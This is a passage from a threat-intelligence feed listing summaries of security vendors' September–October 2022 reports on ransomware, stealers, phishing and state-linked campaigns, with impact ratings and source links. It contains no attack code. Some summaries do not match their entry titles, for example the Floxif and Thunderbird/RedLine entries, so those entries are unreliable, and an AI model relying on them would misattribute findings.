- Securelist researchers discovered multiple downloads of previously unclustered malicious Tor Browser installers. According to their measurements, all the victims targeted by these installers are located in China.
Source:
https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/
—
- Intel Source:
- Crowdstrike
- Intel Name:
- Hackers_using_Comm100_Desktop_Agent_App_to_Spread_Malware
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Researchers from CrowdStrike have identified a new supply chain attack that involves the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor.
Source:
https://www.crowdstrike.com/blog/new-supply-chain-attack-leverages-comm100-chat-installer/
—
- Intel Source:
- Cofense
- Intel Name:
- The_use_of_Wufoo_in_phishing_scams
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- The Cofense Phishing Defence Center recently observed phishing scams that utilize the online form builder Wufoo, a tool commonly associated with easily created surveys and online registration forms. Threat actors have used Wufoo to create simplistic but effective credential-stealing vectors.
Source:
https://cofense.com/blog/scammers-utilize-wufoo-for-vacation-request-phish
—
- Intel Source:
- Sophos
- Intel Name:
- BlackByte_Malware_returns_with_new_tactics
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Researchers from Sophos uncovered BlackByte with new tactics to bypass security products by leveraging the RTCore64.sys vulnerability.
Source:
https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/
—
- Intel Source:
- Avast
- Intel Name:
- A_MafiaWare666_ransomware_decryption_tool
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Avast researchers released a MafiaWare666 ransomware decryption tool. They discovered a vulnerability in the encryption scheme that allows some of the variants to be decrypted without paying the ransom. New or previously unknown samples may encrypt files differently, so they may not be decryptable without further analysis. MafiaWare666 is also known as JCrypt, RIP Lmao, BrutusptCrypt or Hades.
Source:
https://decoded.avast.io/threatresearch/decrypted-mafiaware666-ransomware/
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_file_extension_changed_from_js_to_wsf
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Researchers from ASEC have analyzed the Magniber ransomware script in the WSF format, changing the extension from *.js to *.wsf.
—
- Intel Source:
- eSentire
- Intel Name:
- Highly_evasive_SolarMarker_malware_activity
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
- Researchers from eSentire have observed a spike in drive-by download malware campaigns delivering SolarMarker disguised as document templates.
Source:
https://www.esentire.com/security-advisories/solarmarker-malware-activity
—
- Intel Source:
- Citizenlab
- Intel Name:
- New_Pegasus_Spyware_Abuses
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
- Researchers from Mexican digital rights organization R3D have identified Pegasus infections against journalists and a human rights defender and Citizen Lab provided technical support for R3D’s analysis and validated the infections.
Source:
https://citizenlab.ca/2022/10/new-pegasus-spyware-abuses-identified-in-mexico/
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_using_Microsoft_Office_Documents_to_Deliver_Agent_Tesla_and_njRat
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have analyzed some malicious Microsoft Office documents that attempted to leverage legitimate websites to execute a shell script and then dropped two malware variants of Agent Tesla and njRat.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Bumblebee_malware_continues_to_expand_its_capabilities
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have observed the changes in the behavior of Bumblebee’s servers that occurred around June 2022 indicating that the attackers may have shifted their focus from extensive testing of their malware to reaching as many victims as possible.
Source:
https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/
—
- Intel Source:
- Microsoft
- Intel Name:
- North_Korean_Hackers_Leveraging_Open_Source_Software
- Date of Scan:
- 2022-10-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Microsoft have observed the Zinc threat actor leveraging a wide range of open-source software, including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and the muPDF/Subliminal Recording software installer, for its attacks.
Source:
https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/
—
- Intel Source:
- BlackBerry
- Intel Name:
- New_variant_of_ransomware_dubbed_DJVU
- Date of Scan:
- 2022-10-04
- Impact:
- MEDIUM
- Summary:
- BlackBerry researchers have identified a new DJVU ransomware variant that includes several layers of obfuscation. The threat group is connected with other threats, giving it the option to download and deploy information stealers to exfiltrate data, which gives the threat actors a second way to profit at victims’ expense.
Source:
https://blogs.blackberry.com/en/2022/09/djvu-the-ransomware-that-seems-strangely-familiar
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- Lazarus_group_exploiting_Dell_Driver_Vulnerability_to_Disable_Windows_Security
- Date of Scan:
- 2022-10-04
- Impact:
- MEDIUM
- Summary:
- ESET researchers have identified the Lazarus group deploying a tool on target systems that exploits the Dell DBUtil flaw to disable the monitoring of all security solutions on compromised machines, using never-before-seen techniques against Windows kernel mechanisms.
Source:
https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/
—
- Intel Source:
- Sygnia
- Intel Name:
- Linux_ransomware_Cheerscrypt_linked_with_Chinese_DEV_0401_APT_group
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
- Researchers from Sygnia have investigated a Cheerscrypt ransomware attack that utilized Night Sky ransomware TTPs, and linked the Linux ransomware Cheerscrypt to the China-linked cyber espionage group Bronze Starlight (aka DEV-0401, APT10).
Source:
https://blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-group
—
- Intel Source:
- Securelist
- Intel Name:
- Diving_Deep_into_DeftTorero_Actor
- Date of Scan:
- 2022-10-04
- Impact:
- LOW
- Summary:
- Researchers from Securelist have deeply analyzed the DeftTorero threat actor (aka Lebanese Cedar, Volatile Cedar), which is believed to originate from the Middle East.
Source:
https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/
—
- Intel Source:
- GTSC
- Intel Name:
- Unpatched_Microsoft_Exchange_Zero-Day_Under_Active_Exploitation
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- Researchers from GTSC have identified flaws in fully patched Microsoft Exchange servers that are being exploited by malicious actors in real-world attacks to achieve remote code execution on affected systems.
—
- Intel Source:
- Mandiant
- Intel Name:
- Deploying_malware_on_ESXi_Hypervisors
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- Mandiant is investigating novel malware that achieves persistence within ESXi hypervisors. Mandiant tracks this activity as the threat actor group UNC3886. Given the highly targeted and evasive nature of this intrusion, Mandiant suspects UNC3886’s motivation to be cyber espionage related.
Source:
https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence
—
- Intel Source:
- Lumen
- Intel Name:
- New_Go_Based_Malware_Targeting_Windows_and_Linux_Systems
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Lumen have identified a new multi-functional Go-based malware named Chaos. The malware has grown rapidly in volume in recent months, ensnaring a wide range of Windows and Linux systems, small office/home office (SOHO) routers, and enterprise servers into its botnet.
—
- Intel Source:
- Esentire
- Intel Name:
- Mozilla_Thunderbird_distributing_Redline_Stealer
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- Researchers from Esentire have discovered some of the most dangerous threats including the Kaseya MSP breach and the more_eggs malware in the recent analysis.
Source:
https://www.esentire.com/blog/redline-stealer-and-mozilla-thunderbird
—
- Intel Source:
- Symantec
- Intel Name:
- Malware_hidden_in_Windows_logo_in_cyber_attacks_against_Middle_Eastern_governments
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have observed threat actors using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo in its attacks against Middle Eastern governments.
—
- Intel Source:
- Securonix
- Intel Name:
- Hackers_Targeting_Military_and_Weapons_Contractors
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- Researchers from Securonix have identified a new phishing campaign targeting multiple military contractors involved in weapon manufacturing, including an F-35 Lightning II fighter aircraft components supplier.
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_malicious_decentralized_application_websites_abused_by_Water_Labbu
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- TrendMicro discovered a threat actor, named Water Labbu, that was targeting cryptocurrency scam websites.
—
- Intel Source:
- Disinfo Lab
- Intel Name:
- Media_clones_serving_Russian_propaganda_in_Europe
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- EU DisinfoLab researchers have investigated a large disinformation campaign targeting western audiences with pro-Russian propaganda.
Source:
https://www.disinfo.eu/wp-content/uploads/2022/09/Doppelganger-1.pdf
—
- Intel Source:
- SentinelOne
- Intel Name:
- North_Korea_Lazarus_Hackers_Targeting_macOS_Users
- Date of Scan:
- 2022-10-03
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have reviewed the details of the Operation In(ter)ception campaign and observed a further variant in the same campaign using lures for open positions at the rival exchange Crypto.com.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_ransomware_Bl00dy
- Date of Scan:
- 2022-10-03
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified a new ransomware named “Bl00dy” that is targeting organizations using double extortion techniques. A ransom note is created on the system to demand payment for the encrypted files. After the ransomware encrypts the files, it appends their extension with “.bl00dy.”
Source:
https://blog.cyble.com/2022/09/28/bl00dy-new-ransomware-strain-active-in-the-wild/
—
- Intel Source:
- Multiple
- Intel Name:
- LockBit_3_0_aka_LockBit_Black
- Date of Scan:
- 2022-09-30
- Impact:
- MEDIUM
- Summary:
- Researchers have analyzed LockBit and identified that it is back as LockBit 3.0.
Source:
https://docs.google.com/spreadsheets/d/1Now95XPSkvEiCJy5H5iqgTDKi_ATZeBY_PhnxSUhWl8/edit#gid=0
—
- Intel Source:
- Cisco Talos
- Intel Name:
- A_new_Cobalt_Strike_payload_campaign
- Date of Scan:
- 2022-09-30
- Impact:
- MEDIUM
- Summary:
- Researchers from Cisco have discovered a campaign that is delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
Source:
https://blog.talosintelligence.com/2022/09/new-campaign-uses-government-union.html
—
- Intel Source:
- Sucuri
- Intel Name:
- New_Malware_Variants_Deliver_Fake_Cloudflare_DDoS_Captcha
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have identified malware that prompts the user with a bogus Cloudflare DDoS protection screen; in this new wave, they observed a fake CAPTCHA dialog masquerading as the popular Cloudflare service.
Source:
https://blog.sucuri.net/2022/09/new-malware-variants-serve-bogus-cloudflare-ddos-captcha.html
—
- Intel Source:
- Zscaler
- Intel Name:
- Hackers_using_Quantum_Builder_to_deliver_Agent_Tesla_RAT
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz researchers have observed a campaign that delivers Agent Tesla, a .NET-based keylogger and remote access trojan (RAT), using a builder named “Quantum Builder” sold on the dark web.
Source:
https://www.zscaler.com/blogs/security-research/agent-tesla-rat-delivered-quantum-builder-new-ttps
—
- Intel Source:
- Palo Alto
- Intel Name:
- Polyglot_File_Delivering_IcedID
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- PaloAlto researchers have observed a polyglot Microsoft Compiled HTML Help file being employed in the infection process used by the information stealer IcedID.
Source:
https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload/
—
- Intel Source:
- Cyble
- Intel Name:
- Detecting_and_Removing_Malicious_Software_Masquerading_as_Doenerium_Stealer
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- A spear phishing email campaign targeting Office365 users has been observed by Cyble researchers. The same domain has also been observed hosting several other malware variants, such as the Doenerium stealer.
Source:
https://blog.cyble.com/2022/09/28/new-information-stealer-targeting-crypto-wallets/
—
- Intel Source:
- Crowdstrike
- Intel Name:
- The_examination_of_Wiper_Malware_Part_3
- Date of Scan:
- 2022-09-30
- Impact:
- LOW
- Summary:
- Researchers from CrowdStrike have covered various input/output controls (IOCTLs) in more detail and how they are used to achieve different goals — including acquiring information about infected machines and locking/unlocking disk volumes, among others.
Source:
https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/
—
- Intel Source:
- Palo Alto
- Intel Name:
- Finding_APTs_using_Unsigned_DLLs_Loader
- Date of Scan:
- 2022-09-30
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have observed a method called “unsigned DLL loading”, a technique used to evade detection and execute more sophisticated attacks.
—
- Intel Source:
- ASEC
- Intel Name:
- LockBit_3_0_Ransomware_Spreading_via_Word_Documents
- Date of Scan:
- 2022-09-29
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that LockBit 3.0 ransomware, previously distributed in NSIS format while disguised as job application emails, is also being distributed in Word document format.
Source:
https://asec.ahnlab.com/en/39242/
https://asec.ahnlab.com/en/39259/
—
- Intel Source:
- SentinelOne
- Intel Name:
- Void_Balaur_hack_for_hire_campaigns
- Date of Scan:
- 2022-09-29
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have observed that the cyber mercenary group known as Void Balaur continues to expand its hack-for-hire campaigns and its targeting of a wide variety of individuals and organizations across the globe.
Source:
https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/
—
- Intel Source:
- Securelist
- Intel Name:
- Mass_Emailing_campaign_delivering_Agent_Tesla_malware
- Date of Scan:
- 2022-09-28
- Impact:
- LOW
- Summary:
- Researchers from Securelist have discovered a spam campaign that delivers Agent Tesla malware. On analysis, the email messages were found to be high-quality imitations of business inquiries from real companies.
Source:
https://securelist.com/agent-tesla-malicious-spam-campaign/107478/
—
- Intel Source:
- Securelist
- Intel Name:
- A_Trojan_Downloader_Named_NullMixer
- Date of Scan:
- 2022-09-28
- Impact:
- LOW
- Summary:
- Researchers from Securelist have identified that a large proportion of the malware families dropped by NullMixer are classified as Trojan-Downloaders.
Source:
https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/
—
- Intel Source:
- ReversingLab
- Intel Name:
- Malicious_NPM_package_discovered_in_supply_chain_attack
- Date of Scan:
- 2022-09-28
- Impact:
- MEDIUM
- Summary:
- Researchers from ReversingLabs have identified that the Material Tailwind library is being impersonated in an apparent supply chain attack targeting developers. The team spotted a look-alike NPM package circulating on repositories, intended to trick unwitting developers into using the package in place of the real library.
—
- Intel Source:
- Cluster25
- Intel Name:
- A_new_variant_of_Graphite_Malware
- Date of Scan:
- 2022-09-28
- Impact:
- MEDIUM
- Summary:
- Cluster25 researchers have analyzed a lure document used to implant a variant of Graphite malware, which is linked to the threat actor known as APT28.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Floxif_Malware_Family_Leveraging_Cookies
- Date of Scan:
- 2022-09-27
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a recently disclosed vulnerability by Vectra that affects Microsoft Teams.
Source:
https://isc.sans.edu/forums/diary/Kids+Like+Cookies+Malware+Too/29082/
—
- Intel Source:
- GitHub Blog
- Intel Name:
- Phishing_Campaign_Targeting_GitHub_Accounts
- Date of Scan:
- 2022-09-27
- Impact:
- LOW
- Summary:
- Researchers from GitHub security team have identified that the hackers are targeting GitHub users to steal credentials and two-factor authentication (2FA) codes by impersonating the CircleCI DevOps platform.
Source:
https://github.blog/2022-09-21-security-alert-new-phishing-campaign-targets-github-users/
—
- Intel Source:
- DFIR Report
- Intel Name:
- BumbleBee_Malware_Deploying_Cobalt_Strike_and_Meterpreter
- Date of Scan:
- 2022-09-27
- Impact:
- LOW
- Summary:
- Researchers from DFIR have identified threat actors using BumbleBee malware to deploy Cobalt Strike and Meterpreter. They used RDP and SMB to move around the network looking at backup systems and file shares before being evicted from the network.
Source:
https://thedfirreport.com/2022/09/26/bumblebee-round-two/
—
- Intel Source:
- ASEC
- Intel Name:
- FARGO_Ransomware_Targeting_Vulnerable_Microsoft_SQL_Servers
- Date of Scan:
- 2022-09-27
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of FARGO ransomware targeting vulnerable MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware families that target vulnerable MS-SQL servers.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Chinese_Hacker_Group_TA413_Evolves_Capabilities_to_Target_Tibetans
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- RecordedFuture researchers have observed the targeting of ethnic and religious minority communities by Chinese state-sponsored groups for surveillance and intelligence-gathering purposes.
—
- Intel Source:
- SentinelOne
- Intel Name:
- New_Hacking_Group_Metador_Targeting_Telecommunications_ISPs_and_Universities
- Date of Scan:
- 2022-09-26
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have discovered a new threat actor named Metador that is targeting telecommunications, internet service providers, and universities in several countries in the Middle East and Africa.
Source:
https://assets.sentinelone.com/sentinellabs22/metador
—
- Intel Source:
- Cybergeeks
- Intel Name:
- A_Technical_Analysis_of_Lockbit_3_0_Builder
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- Researchers from Cybergeeks have analyzed LockBit 3.0 builder that was leaked online on 21st September 2022.
Source:
https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/
—
- Intel Source:
- Symantec
- Intel Name:
- Noberus_Ransomware_Continues_to_Develop_its_TTPs
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that the Noberus (aka BlackCat, ALPHV) ransomware has been using new tactics, tools, and procedures in recent months, making the threat more dangerous than ever.
—
- Intel Source:
- Morphisec
- Intel Name:
- NFT_Malware_Gets_New_Evasion_Abilities
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- Researchers from Morphisec have tracked several waves of the NFT malware delivering the Remcos RAT. In June 2022 they found a shift in the crypter used to deliver the Remcos RAT. The Babadeda crypter has now been discarded for a newly staged downloader.
Source:
https://blog.morphisec.com/nft-malware-new-evasion-abilities
—
- Intel Source:
- Sansec
- Intel Name:
- Cybercriminals_target_Magento_vulnerability_in_new_wave_of_attacks
- Date of Scan:
- 2022-09-26
- Impact:
- LOW
- Summary:
- Researchers from Sansec have observed a surge in hacking attempts targeting CVE-2022-24086, a critical Magento 2 vulnerability allowing unauthenticated attackers to execute code on unpatched sites.
Source:
https://sansec.io/research/magento-2-template-attacks
—
- Intel Source:
- BitSight
- Intel Name:
- SystemBC_Malware_Turns_Infected_Computers_into_SOCKS5_Proxies
- Date of Scan:
- 2022-09-23
- Impact:
- LOW
- Summary:
- BitSight researchers have observed that SystemBC malware still turns infected computers into SOCKS5 proxy servers. Most bots cannot be reached from the internet, so this malware uses a backconnect architecture that allows clients to access proxy servers without having to interact directly with them.
Source:
https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes
—
- Intel Source:
- Palo Alto
- Intel Name:
- Cybercriminals_are_Increasingly_Using_Domain_Shadowing
- Date of Scan:
- 2022-09-23
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have discovered that domain shadowing is more widespread than previously thought, discovering 12,197 cases between April and June 2022.
Source:
https://unit42.paloaltonetworks.com/domain-shadowing/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- FODHelper_Delivering_Remcos_RAT
- Date of Scan:
- 2022-09-23
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified a simple batch file that drops a Remcos RAT through an old UAC Bypass technique.
—
- Intel Source:
- ASEC
- Intel Name:
- A_Deep_Analysis_of_Lazarus_Group_Rootkit_Attack_Using_BYOVD
- Date of Scan:
- 2022-09-23
- Impact:
- LOW
- Summary:
- Researchers from ASEC have done a deep analysis of Lazarus Group Rootkit Attack using BYOVD. They are known to be hackers from North Korea, who have attacked various countries in America, Asia, and Europe.
—
- Intel Source:
- CISA
- Intel Name:
- Iranian_hackers_Conduct_Cyber_Operations_Against_the_Government_of_Albania
- Date of Scan:
- 2022-09-22
- Impact:
- MEDIUM
- Summary:
- Researchers from CISA have identified that one of the Iranian threat groups behind the destructive attack on the Albanian government’s network in July had lurked inside its systems for roughly 14 months.
—
- Intel Source:
- Cyble
- Intel Name:
- Distribution_of_NetSupport_RAT_via_SocGholish
- Date of Scan:
- 2022-09-22
- Impact:
- LOW
- Summary:
- Researchers from Cyble have observed attackers using fake browser updates (SocGholish) to deliver the NetSupport RAT.
Source:
https://blog.cyble.com/2022/09/21/netsupport-rat-distributed-via-socgholish/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Active_Exploitation_of_Atlassian_Confluence_Vulnerability
- Date of Scan:
- 2022-09-22
- Impact:
- LOW
- Summary:
- Researchers from Trend Micro have observed samples in the wild that actively exploit the Atlassian Confluence vulnerability (CVE-2022-26134) for malicious cryptocurrency mining.
—
- Intel Source:
- Zscaler
- Intel Name:
- Diving_Deep_into_Crytox_Ransomware
- Date of Scan:
- 2022-09-22
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have done technical analysis of Crytox Ransomware which is multi-stage ransomware with a weak key generation algorithm.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware
—
- Intel Source:
- Cofense
- Intel Name:
- Hackers_Abusing_LinkedIn_Slink_to_Bypass_Secure_Email_Gateway
- Date of Scan:
- 2022-09-22
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a phishing campaign that abuses LinkedIn Smart Links. While impersonating a well-known postal brand is nothing out of the ordinary, these phishing emails continue to pass undetected through popular secure email gateways.
Source:
https://cofense.com/blog/threat-actors-abuse-linkedin-slink-to-bypass-secure-email-gateways
—
- Intel Source:
- Fortinet
- Intel Name:
- Konni_(RAT)_phishing_activity
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- Researchers at Fortinet recently caught a sophisticated phishing attempt deploying malware that they tied to the APT37 group's arsenal, including Konni and other RATs.
Source:
https://www.fortinet.com/blog/threat-research/konni-rat-phishing-email-deploying-malware
—
- Intel Source:
- Cyble
- Intel Name:
- Zoom_Users_Targeted_by_Vidar_Stealer
- Date of Scan:
- 2022-09-21
- Impact:
- MEDIUM
- Summary:
- The researchers from Cyble have observed numerous fake Zoom sites that look exactly like the real Zoom sites. The purpose of these sites is to distribute malware disguised as the legitimate Zoom application.
Source:
https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_file_extension_changed_from_jse_to_js
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- Researchers from ASEC have analyzed the Magniber ransomware script and found that it is still JavaScript, but its file extension has changed from *.jse to *.js.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Attackers_Leveraging_Free_Online_Resources_for_Phishing_Campaigns
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed phishing campaigns using free online resources.
Source:
https://isc.sans.edu/forums/diary/Phishing+Campaigns+Use+Free+Online+Resources/29074/
—
- Intel Source:
- Recorded Future
- Intel Name:
- Attackers_Abusing_Google_Tag_Manager_Payment_Card_E-Skimming
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- According to Recorded Future researchers, 569 e-commerce domains have been infected by Magecart e-skimmers that exfiltrate stolen payment card information to GTM-based e-skimmer domains.
Source:
https://go.recordedfuture.com/hubfs/reports/cta-2022-0920.pdf
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Hackers_Leveraging_Browser_Extensions
- Date of Scan:
- 2022-09-21
- Impact:
- LOW
- Summary:
- Malwarebytes researchers have detected a browser extension family tracked as PUP.Optional.AdMax. These extensions claim to be ad blockers and do have some limited ad-blocking functionality.
Source:
https://www.malwarebytes.com/blog/detections/pup-optional-admax
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Ragnar_Locker_ransomware_roundup_cover
- Date of Scan:
- 2022-09-20
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs gathered data on ransomware variants of interest that have been gaining traction within the OSINT community and in Fortinet's own datasets. This Ransomware Roundup report focuses on Ragnar Locker, giving readers brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against this variant.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-ragnar-locker-ransomware
—
- Intel Source:
- Cyble
- Intel Name:
- Fake_Telegram_Site_Delivering_RAT
- Date of Scan:
- 2022-09-20
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs team identified a fake Telegram website masquerading as a legitimate website that downloads a malicious installer. This installer abuses the Windows Defender application to perform RAT operations.
Source:
https://blog.cyble.com/2022/09/17/fake-telegram-site-delivering-rat-aimed-at-chinese-users/
—
- Intel Source:
- Fortinet
- Intel Name:
- Multiple_Malwares_delivered_by_Excel_Document
- Date of Scan:
- 2022-09-20
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs recently captured an Excel document with an embedded malicious file in the wild. Fortinet researchers found that it exploits a known vulnerability, CVE-2017-11882, to execute malicious code on Microsoft Windows systems. The researchers picked the "lsbjqoyofgkmqbuleooykdekgopmtglvjl.exe" file (saved as "C:\Users\{UserName}\AppData\Roaming\word.exe") as an example to analyze; it is the latest Formbook sample in their malware sample logs.
—
- Intel Source:
- Cofense
- Intel Name:
- Microsoft_365_Phishing_Attacks_Targeting_US_Government_Agencies
- Date of Scan:
- 2022-09-20
- Impact:
- MEDIUM
- Summary:
- Cofense researchers have identified an ongoing phishing campaign targeting U.S. government contractors. In these phishing emails, scammers ask for bids for lucrative government projects, leading users to cloned versions of legitimate government websites.
Source:
https://cofense.com/blog/credential-phishing-targeting-government-contractors-evolves-over-time
—
- Intel Source:
- BlackBerry
- Intel Name:
- Monster_RaaS_campaign_returned_as_a_new_variant
- Date of Scan:
- 2022-09-20
- Impact:
- MEDIUM
- Summary:
- BlackBerry Research & Intelligence team examined all samples about Monster ransomware which is delivered as a 32-bit binary. A hidden user interface gives threat actors control of multiple features of the ransomware on a victim’s machine, including selective encryption, self-deletion, and control over services and processes. Monster is also highly configurable, so threat actors can set their own custom extension and personalized ransom note.
—
- Intel Source:
- VMware
- Intel Name:
- The_Growth_of_Chromeloader_Malware
- Date of Scan:
- 2022-09-20
- Impact:
- LOW
- Summary:
- Researchers from VMware have analyzed ChromeLoader malware and warned of an ongoing campaign in which malicious browser extensions, node-WebKit-based malware, and ransomware are being distributed.
Source:
https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Preventing_ISO_Malware
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things.
—
- Intel Source:
- Recorded Future
- Intel Name:
- Russia-Nexus_UAC-0113_Emulating_Telecommunication_Providers_in_Ukraine
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- Researchers at Insikt Group, while monitoring UAC-0113 infrastructure, observed the recurring use of dynamic DNS domains masquerading as telecommunication providers operating in Ukraine, which shows that the group's efforts to target entities in Ukraine remain ongoing. Domain masquerades can enable spearphishing campaigns or redirects that pose a threat to victim networks.
Source:
https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine
https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf
—
- Intel Source:
- Securelist
- Intel Name:
- The_widespread_of_RedLine_stealer
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- Securelist's researchers recently caught suspicious activity that was part of a collection of malicious programs distributed in the form of a single installation file, self-extracting archive, or other file with installer-type functionality.
Source:
https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_details_of_a_Publicly_Available_Slam_Ransomware_Builder
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- SentinelOne analysts have detailed the Slam Ransomware Builder and how free ransomware builders like Slam offer an easy route into cybercrime while still presenting a credible threat to organizations and enterprises. They also provided a detailed list of indicators to help security teams detect and protect against Slam ransomware payloads.
—
- Intel Source:
- Aquasec
- Intel Name:
- TeamTNT_threat_actors_targeting_cloud_environments
- Date of Scan:
- 2022-09-19
- Impact:
- LOW
- Summary:
- Aqua Security analysts observed and analyzed three different attacks on their honeypots over the past week. The scripts and malware that were used bear a striking resemblance to those of the threat actor TeamTNT.
Source:
https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Word_Maldoc_With_CustomXML_and_Renamed_VBAProject
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed samples and found one of them is that the VBA project file (ole file) is named FIzzyWAbnj.bin instead of the usual VBAProject.bin.
—
- Intel Source:
- Sekoia
- Intel Name:
- PrivateLoader_the_most_widely_used_loader_in_2022
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- PrivateLoader became one of the most widespread loaders used by pay-per-install (PPI) services in 2022. SEKOIA analysts tracked PrivateLoader's network infrastructure for several months and recently conducted an in-depth analysis of the malware. In parallel, they also monitored activities related to the ruzki PPI malware service.
Source:
https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Russia_linked_Gamaredon_APT_Targeting_Ukraine_Using_InfoStealer_Malware
- Date of Scan:
- 2022-09-16
- Impact:
- LOW
- Summary:
- Researchers at Cisco Talos have observed that the Russia-linked Gamaredon group has been targeting Ukrainian government, defense, and law enforcement agencies with a custom-made information-stealer implant.
Source:
https://blog.talosintelligence.com/2022/09/gamaredon-apt-targets-ukrainian-agencies.html
—
- Intel Source:
- Cloudsek
- Intel Name:
- Revived_Version_of_Raccoon_Stealer
